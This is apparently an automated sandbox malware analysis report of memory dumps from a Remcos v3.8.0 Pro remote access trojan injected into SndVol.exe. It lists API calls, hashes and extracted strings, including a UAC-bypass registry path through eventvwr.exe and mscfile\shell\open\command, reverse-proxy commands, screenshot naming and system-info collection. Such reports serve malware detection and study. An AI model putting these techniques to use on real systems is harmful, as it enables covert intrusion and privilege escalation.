                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                  • String ID: 05ou`ou$H"G$H"G
                                                                  • API String ID: 3795512280-2072512923
                                                                  • Opcode ID: 57fb3b3187018bfa0d892294d8208e0ca4ac340358e943beb335dea4f3d9221f
                                                                  • Instruction ID: 4376f970c3616d3ec3ef203eabf572eb6dd6f06176f27286a892abec863daca7
                                                                  • Opcode Fuzzy Hash: 57fb3b3187018bfa0d892294d8208e0ca4ac340358e943beb335dea4f3d9221f
                                                                  • Instruction Fuzzy Hash: 3551B2713042095BE718BB7AC854ABE779D9F87708F000F6CAA46D71E1DFD4B9058653
                                                                  APIs
                                                                  • SetEvent.KERNEL32(?,?), ref: 0040549F
                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                                                  • TranslateMessage.USER32(?), ref: 0040555E
                                                                  • DispatchMessageA.USER32(?), ref: 00405569
                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                  • API String ID: 2956720200-749203953
                                                                  • Opcode ID: f079c0d2b34872d8ae1ebe3bc79dc5d6cccdd417140d8d14566b63fd3ec36c73
                                                                  • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                                                  • Opcode Fuzzy Hash: f079c0d2b34872d8ae1ebe3bc79dc5d6cccdd417140d8d14566b63fd3ec36c73
                                                                  • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                                                  APIs
                                                                    • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416123
                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                  • String ID: <$@$@%G$@%G$Temp
                                                                  • API String ID: 1704390241-4139030828
                                                                  • Opcode ID: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
                                                                  • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                                                  • Opcode Fuzzy Hash: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
                                                                  • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                                                  • ExitProcess.KERNEL32 ref: 00406782
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExecuteExitProcessShell
                                                                  • String ID: C:\Windows\SysWOW64\SndVol.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                  • API String ID: 1124553745-1756190855
                                                                  • Opcode ID: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
                                                                  • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                                                  • Opcode Fuzzy Hash: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
                                                                  • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                  • String ID:
                                                                  • API String ID: 221034970-0
                                                                  • Opcode ID: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
                                                                  • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                                                  • Opcode Fuzzy Hash: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
                                                                  • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00445645
                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                  • _free.LIBCMT ref: 00445651
                                                                  • _free.LIBCMT ref: 0044565C
                                                                  • _free.LIBCMT ref: 00445667
                                                                  • _free.LIBCMT ref: 00445672
                                                                  • _free.LIBCMT ref: 0044567D
                                                                  • _free.LIBCMT ref: 00445688
                                                                  • _free.LIBCMT ref: 00445693
                                                                  • _free.LIBCMT ref: 0044569E
                                                                  • _free.LIBCMT ref: 004456AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                  • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                                                  • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                  • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00417F6F
                                                                  • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                                                  • Sleep.KERNEL32(000003E8), ref: 004180B3
                                                                  • GetLocalTime.KERNEL32(?), ref: 004180BB
                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                  • API String ID: 489098229-3790400642
                                                                  • Opcode ID: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
                                                                  • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                                                  • Opcode Fuzzy Hash: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
                                                                  • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                                                  APIs
                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DecodePointer
                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                  • API String ID: 3527080286-3064271455
                                                                  • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                  • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                                                  • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                  • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                  • Sleep.KERNEL32(00000064), ref: 00415A46
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                  • API String ID: 1462127192-2001430897
                                                                  • Opcode ID: eb407d141be18b2fbf158262ca999d871c43cfb7c9dc42f29a5b9d793daecc2f
                                                                  • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                                                  • Opcode Fuzzy Hash: eb407d141be18b2fbf158262ca999d871c43cfb7c9dc42f29a5b9d793daecc2f
                                                                  • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                                                  APIs
                                                                  • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocConsoleShowWindow
                                                                  • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                                                  • API String ID: 4118500197-4025029772
                                                                  • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                  • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                                                  • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                  • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                                                    • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                    • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                    • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                                                  • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                                                  • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                                                  • TranslateMessage.USER32(?), ref: 0041B29E
                                                                  • DispatchMessageA.USER32(?), ref: 0041B2A8
                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                  • String ID: Remcos
                                                                  • API String ID: 1970332568-165870891
                                                                  • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                  • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                                                  • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                  • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 694ad35582159027617efb05aef66a3d5b04e60223d1b3b6b0413602b7ba056d
                                                                  • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                                                  • Opcode Fuzzy Hash: 694ad35582159027617efb05aef66a3d5b04e60223d1b3b6b0413602b7ba056d
                                                                  • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                                                  APIs
                                                                    • Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                                                  • __dosmaperr.LIBCMT ref: 00452ED6
                                                                  • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                                                  • __dosmaperr.LIBCMT ref: 00452EF5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                                                  • GetLastError.KERNEL32 ref: 00453091
                                                                  • __dosmaperr.LIBCMT ref: 00453098
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                  • String ID:
                                                                  • API String ID: 4237864984-0
                                                                  • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                  • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                                                  • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                  • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                                                  • __alloca_probe_16.LIBCMT ref: 004510CA
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                                                  • __alloca_probe_16.LIBCMT ref: 00451174
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                                                  • __freea.LIBCMT ref: 004511E3
                                                                  • __freea.LIBCMT ref: 004511EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                  • String ID:
                                                                  • API String ID: 201697637-0
                                                                  • Opcode ID: 5dd519cdf614e137a58fad772f0fbbc90d71aea9dd9d09398d72cbf8dce97a11
                                                                  • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                                                  • Opcode Fuzzy Hash: 5dd519cdf614e137a58fad772f0fbbc90d71aea9dd9d09398d72cbf8dce97a11
                                                                  • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 048F264A
                                                                    • Part of subcall function 048FA6F1: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,048E4DF4), ref: 048FA718
                                                                    • Part of subcall function 048F763E: CloseHandle.KERNEL32(048E4E6D,?,?,048E4E6D,00462E24), ref: 048F7654
                                                                    • Part of subcall function 048F763E: CloseHandle.KERNEL32($.F,?,?,048E4E6D,00462E24), ref: 048F765D
                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 048F2937
                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 048F2967
                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 048F299D
                                                                    • Part of subcall function 048E5819: send.WS2_32(?,00000000,00000000,00000000), ref: 048E58AE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                  • String ID: $.F$@#G$@#G
                                                                  • API String ID: 1937857116-4208588984
                                                                  • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                                                  • Instruction ID: 7037c899519e3dba163fa41f78eec871387724b433c2d6831e210f4a5c4bcb76
                                                                  • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                                                  • Instruction Fuzzy Hash: A6F185316183459AE328FB39D850AFF77D8AF95304F404E5DA586C31A0EEF4BA49C653
                                                                  APIs
                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                  • _memcmp.LIBVCRUNTIME ref: 00442935
                                                                  • _free.LIBCMT ref: 004429A6
                                                                  • _free.LIBCMT ref: 004429BF
                                                                  • _free.LIBCMT ref: 004429F1
                                                                  • _free.LIBCMT ref: 004429FA
                                                                  • _free.LIBCMT ref: 00442A06
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                  • String ID: C
                                                                  • API String ID: 1679612858-1037565863
                                                                  • Opcode ID: 0b4de82b44ea59e8747fa3c20bc7230b1bed574c57169c5712789c008706209c
                                                                  • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                                                  • Opcode Fuzzy Hash: 0b4de82b44ea59e8747fa3c20bc7230b1bed574c57169c5712789c008706209c
                                                                  • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                                                  APIs
                                                                    • Part of subcall function 049264BD: GetLastError.KERNEL32(?,0491FC32,0491932D,0491FC32,00471E90,?,0491D9B2,FF8BC35D,00471E90,00471E90), ref: 049264C1
                                                                    • Part of subcall function 049264BD: _free.LIBCMT ref: 049264F4
                                                                    • Part of subcall function 049264BD: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926535
                                                                    • Part of subcall function 049264BD: _abort.LIBCMT ref: 0492653B
                                                                  • _memcmp.LIBVCRUNTIME ref: 049236CD
                                                                  • _free.LIBCMT ref: 0492373E
                                                                  • _free.LIBCMT ref: 04923757
                                                                  • _free.LIBCMT ref: 04923789
                                                                  • _free.LIBCMT ref: 04923792
                                                                  • _free.LIBCMT ref: 0492379E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                  • String ID: C
                                                                  • API String ID: 1679612858-1037565863
                                                                  • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                                                  • Instruction ID: 5c2beaadb35068ae2ad9ac5a6dc4572f890f7ba6fe3e0509dd100cdd68ae0ecc
                                                                  • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                                                  • Instruction Fuzzy Hash: 01B13A75A012299FDB24DF28C984AADB7B9FF48304F1045EAD80AA7354E735BE90CF40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tcp$udp
                                                                  • API String ID: 0-3725065008
                                                                  • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                  • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                                                  • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                  • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                                                  APIs
                                                                    • Part of subcall function 048F0F99: SetLastError.KERNEL32(0000000D,048F1519,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,048F14F7), ref: 048F0F9F
                                                                  • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,048F14F7), ref: 048F1534
                                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,048F14F7), ref: 048F15A2
                                                                  • SetLastError.KERNEL32(0000000E), ref: 048F15C6
                                                                    • Part of subcall function 048F14A0: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,048F15E4,?,00000000,00003000,00000004,00000000), ref: 048F14B0
                                                                  • GetProcessHeap.KERNEL32(00000008,00000040), ref: 048F160D
                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 048F1614
                                                                  • SetLastError.KERNEL32(0000045A), ref: 048F1727
                                                                    • Part of subcall function 048F1874: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,048F1734), ref: 048F18E4
                                                                    • Part of subcall function 048F1874: HeapFree.KERNEL32(00000000), ref: 048F18EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorHeapLast$Process$AllocAllocateFreeInfoNativeSystemVirtual
                                                                  • String ID: $.F
                                                                  • API String ID: 2227336758-1421728423
                                                                  • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                                                  • Instruction ID: 5ccca61dbef773d765d467af74286a081ecdad5fe931ef5c48ee803f44370018
                                                                  • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                                                  • Instruction Fuzzy Hash: 4161F570200601EFD7509F69CD88B6A7BE5BF88744F444B19EA09CB285EBB4FC51CBA5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Eventinet_ntoa
                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                  • API String ID: 3578746661-168337528
                                                                  • Opcode ID: 668acd623b90f3b0cdf34578d0f5251299bc4f70ab8d2d7e652f4e1ee58cd933
